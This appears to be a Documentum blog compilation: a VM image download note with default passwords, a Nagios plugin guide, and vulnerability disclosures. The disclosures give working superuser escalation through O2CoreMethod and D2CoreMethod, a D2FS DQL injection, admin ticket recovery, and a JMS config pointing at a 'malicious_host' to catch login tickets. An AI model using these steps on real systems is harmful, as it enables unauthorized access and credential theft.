PostgreSQL DEV image available

ftp://ftp2.lss.emc.com/Hotfixes/postgress/Image-Postgres/ (credential could be found in CS6.7SP1/7.0 patch notes, google is also your friend).

This VM image has a Postgres Database, Documentum Content Server, Postgres based pre-configured repository (MyRepo),
DA and REStful services deployed on apache-tomcat server.

Steps to use the VM player for running the VM image
=======================================================

1. Extract the CentOSPostgres18Feb.rar file using WinRAR.

This rar file contains:
-CentOSPostgres20Feb14.mf
-CentOSPostgres20Feb14.ovf
-CentOSPostgres20Feb14-disk1.vmdk
-ReadMe.txt
-Documentum Reference Guides: Refernce guides related to documentum

2. Download and install the VMware player 6.0.1 or any other VM Player which supports ovf format. 

3. Once the VMware player is running , launch the VM by selecting the *.ovf file.

4. If the host CPU is Intel 64 bit ,you may encounter an error regarding Intel VT-x being disabled on the machine;
   reboot the machine and goto BIOS setting-> under CPU settings, enable Intel Virtualization preference.

5. Once the VM Image is up and running login with dmadmin/password credential.

6. Once you login in to the VM, refer readme in $HOME directory.

7 . root user password for VM image is password.

UPDATE

the download address has been changed, new address is ftp://ftp2.lss.emc.com/dev_out/Image-Postgres/

documentum security vulnerabilities: more deep dive in D2

To be honest, it took some time to hack D2GetAdminTicketMethod in 4.2 release, but that time was not wasted at all – now I know that D2 is a pretty big security hole šŸ™‚

O2CoreMethod

Allows to execute any dql statement with superuser privileges (actually the length of statement could not exceed 250 characteres):

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> create,c,dm_job
...
08002f0a80005dbc
API> append,c,l,method_arguments
SET> -dql update dm_user object set user_privileges=16 where user_name='hacker'
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='O2CoreMethod', 
    arguments='-docbase_name d242 -password "" -job_id 08002f0a80005dbc -transaction false'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16

D2FS WebService

I have no idea about whether D2 web-interface allows user to execute DQL statements or not (for example in latest webtop release EMC restricted access to DQL Editor component due to a lot of security issues described in this blog), but D2FS WebService does.

Unsuccessful attempt to create object through d2fs:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
           xmlns:con="http://www.emc.com/d2fs/services/content_service" 
           xmlns:com="http://www.emc.com/d2fs/models/common" 
           xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                   dql="create dm_document object set object_name='test'">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <soapenv:Fault>
            <faultcode>soapenv:Server</faultcode>
            <faultstring xml:lang="en">Exception Service</faultstring>
            <detail>
                <faultDocument target="IllegalStateException" 
                               reason="No match found" code="D2-SERVICE-ERR" 
                               xmlns="http://www.emc.com/d2fs/exceptions">
                    ......................................
                               </faultDocument>
            </detail>
        </soapenv:Fault>
    </soapenv:Body>
</soapenv:Envelope>

workaround (note “; union” at the end of query):

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
                  xmlns:con="http://www.emc.com/d2fs/services/content_service" 
                  xmlns:com="http://www.emc.com/d2fs/models/common" 
                  xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                dql="create dm_document object set object_name='test'; union ">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                    repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <ns17:getDQLContentResponse 
                     xmlns:ns17="http://www.emc.com/d2fs/services/content_service"
                     xmlns="http://www.emc.com/d2fs/exceptions"
                     xmlns:ns18="http://www.emc.com/d2fs/models/item"
                     xmlns:ns3="http://www.emc.com/d2fs/models/common">
            <ns18:docItems>
                <ns18:upperItem children="false" immutable="false" 
                         selected="false" type="DQL" ns3:id="2"/>
                <ns18:items children="false" immutable="false" 
                         selected="false" ns3:id="0000000000000000"/>
            </ns18:docItems>
        </ns17:getDQLContentResponse>
    </soapenv:Body>
</soapenv:Envelope>

D2CoreMethod

Has the same problem as O2CoreMethod but does not require to create dm_job object:

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> ?,c,execute do_method with method='D2CoreMethod', 
   arguments='-docbase_name d242 -password "" 
   -dql_filter "update dm_user object set user_privileges=16 where user_name=''hacker''"'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16

God bless EMC. Part IV

Previously I had written about security vulnerability in D2’s D2GetAdminTicketMethod method, starting from 4.2 release EMC have changed behavior of D2 methods – now D2 encrypts method arguments and return value passed through c6_method_return object:

1> create c6_method_return object set message='test'
2> go
object_created
----------------
00002f0a8000291d
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global -timeout 3600'
4> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002f0a8000291d'
2> go
message
----------------------------------------------------------------------------
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+
44/DdBkvmi6A5v7+wF5+b0wR3saQFhxTX7Rfu/vVVFfvEehYAJNvDAvd/vtWvpJa+6N3Zmz+SZgH
q6x59int5a8CmSXhrZiflwcs+psMaOcStVyY/lYZGrGMdY4y9eEqn1psnQ+azA0cmfRZfn7uJJbc
KJmARVgaPFZN4FbEdbeu94PrNUU/lQrtKs+NaiwColY/WYEY8MlzkZhQ249koCHqgd07/TLdAX6l
9xCtvyIJf7cQeSi/4Xl4NlQ92O5RRFwPxIdHz0dhwSxnVptqGoRqMTcpw/NTJ5ldA5ZrhRnudAhi
iUt2b3PP0UBjVUjnpA9QD5sLR2DxUX4ysUbI2MDoYlzcnL5MYWLvEqq3K6gPXA8YJAgUwIIYbDqo
rXZEtet2cAl5zKCgDAqL6AqIPzcFn1sIDqy6p72D1kvQF4iFs2oQJZAT55j+C6SGcm4DoJYskpGg
/AwBiE0YFQX2zqjwqbSPcGSoIZDmoPZFELGjySl0xxjWcwW5HXh7194j73FW2FV82cMNZVIyf2/f
gWRMt+rw315VhwORReJYfMhibTBHR+CC+ySOetT7xvEMBVarfEOUHqGvs9hLZWYhgpBa2EgBKUZQ
jFBRe2SmK1E0aR7hmS1zbdATDJJGNhP9PrDLaHelunjgawEoAoMilY51EPgwqI2MuA==
(1 row affected)

So, now we are getting some garbage instead of ticket.

Is it possible to decrypt that garbage?
YES! Note how encrypted password is passed as integer argument (timeout) and D2 says that it’s not an integer:

1> update c6_method_return object
2> set parameter_name[0]='-timeout',
3> set parameter_value[0]=(select message from c6_method_return
4> where r_object_id='00002f0a8000291d')
5> where r_object_id='00002f0a8000291d'
6> go
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."

1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global'
4> go
...
(1 row affected)

1> select error from c6_method_return where r_object_id='00002f0a8000291d'
2> go
error
----------------------------------------------------------------------------
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ
(1 row affected)

Nagios plugin for Documentum

This post is bit outdated, please check Q & A. VIII for complete description

Installation:

 ~]# easy_install argparse nagiosplugin dctmpy
Searching for argparse
Reading http://pypi.python.org/simple/argparse/
Best match: argparse 1.2.1
Downloading http://argparse.googlecode.com/files/....
Processing argparse-1.2.1.tar.gz
Running argparse-1.2.1/setup.py -q bdist_egg ...
Adding argparse 1.2.1 to easy-install.pth file

Installed /usr/lib/python2.6/site-packages/argparse-1.2.1-py2.6.egg
Processing dependencies for argparse
Finished processing dependencies for argparse
Searching for nagiosplugin
Reading http://pypi.python.org/simple/nagiosplugin/
Best match: nagiosplugin 1.2
Downloading https://pypi.python.org/packages/....
Processing nagiosplugin-1.2.zip
Running nagiosplugin-1.2/setup.py -q bdist_egg ...
Adding nagiosplugin 1.2 to easy-install.pth file

Installed /usr/lib/python2.6/site-packages/nagiosplugin-1.2-py2.6.egg
Processing dependencies for nagiosplugin
Finished processing dependencies for nagiosplugin
Searching for dctmpy
Reading http://pypi.python.org/simple/dctmpy/
Best match: dctmpy 0.1.2
Downloading https://pypi.python.org/packages/....
Processing dctmpy-0.1.2.tar.gz
Running dctmpy-0.1.2/setup.py -q bdist_egg ...
Adding dctmpy 0.1.2 to easy-install.pth file
Installing nagios_check_docbase script to /usr/bin
Installing nagios_check_docbroker script to /usr/bin

Installed /usr/lib/python2.6/site-packages/dctmpy-0.1.2-py2.6.egg
Processing dependencies for dctmpy
Finished processing dependencies for dctmpy

Check session creation:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
        -m login
LOGIN OK

Check session count:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m sessioncount -w 70 -c 80
SESSIONCOUNT OK - sessioncount is 8
| sessioncount=8;70;80;0;100

Check projection targets:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m targets
TARGETS OK - ssc_dev.ssc_dev has status Open on 192.168.2.56:1489

Check JMS status:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m jmsstatus
JMSSTATUS OK - JMS docu70dev01.sinera.remote:9080 for ssc_dev.ssc_dev - OK

Check failed auto-activities:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m failedtasks
FAILEDTASKS CRITICAL - 1 task(s): 'Last Performer' (tp002-000_user1)

Check job scheduling:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
     -m jobs -j "dm_DMFilescan,dm_LogPurge" -n system_clenup_jobs
SYSTEM_CLENUP_JOBS CRITICAL - dm_DMFilescan is inactive, dm_LogPurge is inactive

Check indexagent status:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
     -m indexagents
INDEXAGENTS WARNING - Indexagent ssc_dev_ftindex_01/docu70dev01_9200_IndexAgent is stopped

Check fulltext indexing queue:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
     -m indexqueue -w 1000 -c 2000
INDEXQUEUE CRITICAL - _fulltext_index_user is 4.978e+04 (outside range 0:2000)
| _fulltext_index_user=49781;1000;2000;0

documentum security vulnerabilities: JMS HA feature

In Documentum 6.6 release EMC introduced high-availability feature for JMS:

and now any user is able to create dm_jms_config object pointing to malicious http server and catch login tickets:

create dm_jms_config object 
set object_name='malicious JMS config',
set config_type=2,
append server_config_id=(select r_object_id from dm_server_config)
append servlet_name='do_bpm',
append base_uri='http://malicious_host:port/....',
append supported_protocol='http',
append projection_enable=TRUE,
append projection_proximity_value=1,
append projection_targets='malicious_host',
append projection_ports=0